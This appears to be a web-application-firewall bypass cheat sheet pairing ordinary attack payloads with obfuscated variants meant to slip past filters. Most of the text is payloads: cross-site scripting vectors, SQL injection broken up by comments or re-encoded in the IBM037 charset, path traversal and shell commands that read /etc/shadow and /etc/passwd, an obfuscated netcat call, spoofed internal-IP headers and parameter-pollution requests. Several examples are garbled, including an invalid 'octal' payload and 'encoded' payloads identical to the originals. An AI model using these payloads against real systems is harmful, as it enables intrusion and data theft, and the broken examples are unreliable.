🔥 Web application firewalls (WAFs) bypass
Different techniques can be used to bypass the regex filters on the firewalls. Examples include alternating case, adding line breaks, and encoding payloads. Resources for the various bypasses can be found at PayloadsAllTheThings and OWASP.
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
While obfuscation is a possible way to bypass regex, they have been divided into different sections to showcase more exclusively a selection of obfuscation techniques.
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
This technique involves modifying the Content-Type header to use a different charset (e.g. ibm037). A WAF that is not configured to detect malicious payloads in different encodings may not recognize the request as malicious. The charset encoding can be done in Python
# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037
##Python code
import urllib
s = 'payload'
print(urllib.parse.quote_plus(s.encode("IBM037")))
## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 61
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
Depending on the implementation of Unicode normalization, characters that share Unicode compatability may be able to bypass the WAF and execute as the intended payload.
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
<img src⁼p onerror⁼'prompt⁽1⁾'﹥ --> <img src=p onerror='prompt(1)'>
Combine upper and lower case characters for creating efficient payloads.
<script>confirm()</script>
Bypassed Technique:
<ScrIpT>confirm()</sCRiPt>
- Encode normal payloads with % encoding/URL encoding.
- You can use Burp. It has an encoder/decoder tool.
<Svg/x=">"/OnLoAD=confirm()//
Bypassed Technique:
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F
- ASCII characters in Unicode encoding give us great variants for bypassing WAF.
- Encode entire or part of the payload for obtaining results.
<marquee onstart=prompt()>
Obfuscated:
<marquee onstart=\u0070r\u06f\u006dpt()>
/?redir=http://google.com
Bypassed Technique:
/?redir=http://google。com (Unicode alternative)
<marquee loop=1 onfinish=alert()>x
Bypassed technique:
<marquee loop=1 onfinish=alert︵1)>x (Unicode alternative)
../../etc/shadow
Obfuscated:
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow
- WebApps encode special characters into HTML. Encoding and render them accordingly.
- Basic bypass cases with HTML encoding numeric and generic.
"><img src=x onerror=confirm()>
Encoded Payload:
"><img src=x onerror=confirm()>
Encoded Payload:
"><img src=x onerror=confirm()>
- Such rules often tend to filter out a specific type of encoding.
- Such filters can be bypassed by mixed encoding payloads.
- Newlines and tabs and further add to obfuscation.
Obfuscate Payload:
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
- Comments obfuscate standard payload vectors.
- Different payloads have different ways of obfuscation.
<script>confirm()</script>
Bypassed Technique:
<!--><script>confirm/**/()/**/</script>
/?id=1+union+select+1,2--
Bypassed Technique:
/?id=1+un/**/ion+sel/**/ect+1,2--
- Web Application Firewall filters tend to encode characters to protect web app.
- Poorly developed filters (without recursion filters) can be bypassed with double encoding.
<script>confirm()</script>
Obfuscate Payload:
%253Cscript%253Econfirm()%253C%252Fscript%253E
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
Obfuscate Payload:
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
- Global patterns are used by various command-line utilities to work with multiple files.
- We can change them to run system commands.
/bin/cat /etc/passwd
Obfuscate Payload:
/???/??t /???/??ss??
/bin/nc 127.0.0.1 443
Obfuscate Payload:
/???/n? 2130706433 443
- Programming languages have different patterns and syntaxes for concatenation.
- This allows us to generate payloads that can bypass many filters and rules.
<script>confirm()</script>
Obfuscate Payload:
<script>eval('con'+'fi'+'rm()')</script>
/bin/cat /etc/shadow
Obfuscate Payload:
/bi'n'''/c''at' /e'tc'/sh''ad'ow
<iframe/onload='this["src"]="javascript:confirm()"';>
Obfuscate Payload
<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:con"+"fir"+"m()"';>
- Simple payloads get filtered out easily by WAF.
- Adding some junk chars helps avoid detection (only specific cases ).
- This technique often helps in confusing regex-based firewalls.
<script>confirm()</script>
Obfuscate Payload:
<script>+-+-1-+-+confirm()</script>
<a href=javascript;alert()>ClickMe
Bypassed Technique:
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- A lot of WAFs with regex-based filtering effectively blocks many attempts.
- Line breaks technique (CR and LF) can break firewall regex and bypass stuff.
<iframe src=javascript:confirm(hacker)">
Obfuscate Payload:
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hacker)">
-
Wrong regular expression based filters can be evaded with uninitialized bash variables.
-
Such value equal to null and acts like empty strings.
-
Bash and perl allow such kind of interpretations.
-
First Level Obfuscation: Normal
/bin/cat /etc/shadow
Obfuscate Payload:
/bin/cat$u /etc/shadow$u
- Second Level Obfuscation: Position Based
/bin/cat /etc/shadow
Obfuscate Payload:
$u/bin$u/cat$u $u/etc$u/shadow$u
- Third Level Obfuscation: Random characters
/bin/cat /etc/passwd
Obfuscate Payload:
$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
- Tabs often help to evade firewalls, especially regex-based.
- Tabs can help break WAF regex when the regex is expecting whitespaces and not tabs.
<IMG SRC="javascript:confirm();">
Bypassed Technique:
<IMG SRC=" javascript:confirm();">
<IMG SRC=" jav ascri pt:confirm ();">
<iframe src=javascript:confirm()></iframe>
Obfuscate Payload:
<iframe src=j	a	v	a	s	c	r	i	p	t	:c	o	n	f	i	r	m	%28	%29></iframe>
- Many web applications support different encoding types and can interpret the encoding.
- We always need to obfuscate the payload to a format not supported by WAF, but the server can smuggle our payload.
- IIS 6, 7.5, 8, and 10 allow IBM037 character interpretations.
- Send the encoded parameters with the query.
POST /example.aspx?id7=sometext HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 27
id2='union all select * from users--
Obfuscated Request with URL Encoding:
POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 127
%89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99%97%94%40%A4%A2%85%99%A2%60%60
In some cloud-based WAFs, the request won’t be checked if the payload exceeds a certain size. In these scenarios, it is possible to bypass the firewall by increasing the size of the request body or URL.
- The target is to fool the WAF/server into believing it was from their internal network.
- Adding some spoofed headers to represent the internal network, does the trick.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
- The null bytes are commonly used as string terminator.
- This can help us evade many web application filters in case they are not filtering out the null bytes.
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
- This attack method is based on how a server interprets parameters with the same names.
- Possible bypass chances here are:
- The server uses the last received parameter, and WAF checks only the first.
- The server unites the value from similar parameters, and WAF checks them separately.
http://example.com/home?redirectURL=internalPage
malicious code
http://example.com/home?redirectURL=internalPage&redirectURL=http://malicious.com
POST /payslip HTTP/1.1
Host: vulnerable.dev
{
"month" : "March",
"year" : "2010"
}
malicious code
POST /payslip HTTP/1.1
Host: vulnerable.dev
{
"month" : "March",
"year" : "2010",
"month" : "April' and 1=1 -- a"
}
- w3af — Web Application Attack and Audit Framework
- wafw00f — Identify and fingerprint Web Application Firewall
- BypassWAF – Bypass firewalls by abusing DNS history. This tool will search for old DNS A records and check if the server replies for that domain.
- CloudFail – is a tactical reconnaissance tool that tries to find the original IP address behind the Cloudflare WAF.